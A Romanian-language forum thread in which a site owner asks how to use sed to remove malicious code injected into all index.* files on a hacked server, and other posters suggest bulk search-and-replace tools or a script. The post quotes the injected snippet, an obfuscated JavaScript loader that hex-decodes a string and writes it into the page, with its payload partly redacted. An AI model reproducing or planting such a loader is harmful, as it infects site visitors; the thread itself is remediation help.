-
Functie SED
Vreau sa stiu daca cu ajutorul unei functii sed se poate scoate o sectiune de cod din toate fisierele index.*. Un server a fost infectat si infectia a adaugat la sfarsitul fisierelor mentionate anterior urmatorul cod:
Cod:
<script>
var Vg='a06d04937ccdc754e9ebc1[removed]583d84';
var HJN = '';
var q = Vg.slice ( 38, 14236 );
for ( K = 38 ; K < 14236 ; K += 2 )
{
HJN += '%' + Vg.slice ( K, K + 2 );
}
document.write(unescape(HJN));
</script>
<!--sd313qwoiu92-->
Mentionez ca in directorul fiecarui fisier infectat a aparut si zcv.gif care este o alta infectie. Asta se poate rezolva repesor, stergand toate fisierele cu acest nume de pe server dar prima chestiune ramane problema cea mare.
O sa.mi spuneti sa vorbesc cu cei de la host, de doua zile de la livechat ma trimit la tichete si uite asa trec zilele si nimeni nu ma ajuta in rezolvarea problemei.
Va multumesc pentru sfaturi, idei.
ps: cu ocazia asta nu recomand nimanui sa va hostati site.urile la westhost.com
-
salut,
dar de ce nu incerci sa iei toate fisierele pe pc si apoi cu ajutorul lui notepad++ sa le deschizi pe toate si cu ajutorul functiei search and replace sa rezolvi pb?
cu stima,
Claudiu
-
total commander stie sa faca automat search and replace in mai multe fisiere deodata :)
-
-
Nu m.am gandit la solutia asta. Notepad++ stiu ca face asa ceva, chiar i.am folosit optiunea in mai multe cazuri.
Problema e ca sunt muulte fisiere, sa nu spun foarte multe. O sa iau in considerare propunerea voastra in caz ca nu exista altceva mai convenabil.
Ceva informatii legate de functia sed de care am intrebat?
Multumesc tuturor!
-
Daca ai access ssh si permisiuni sa executi sed este posibil. Daca nu, poti face un script ca sa faca directory discovery si sa faca treaba asta tot automat. O sa dureze.. insa get's de job done.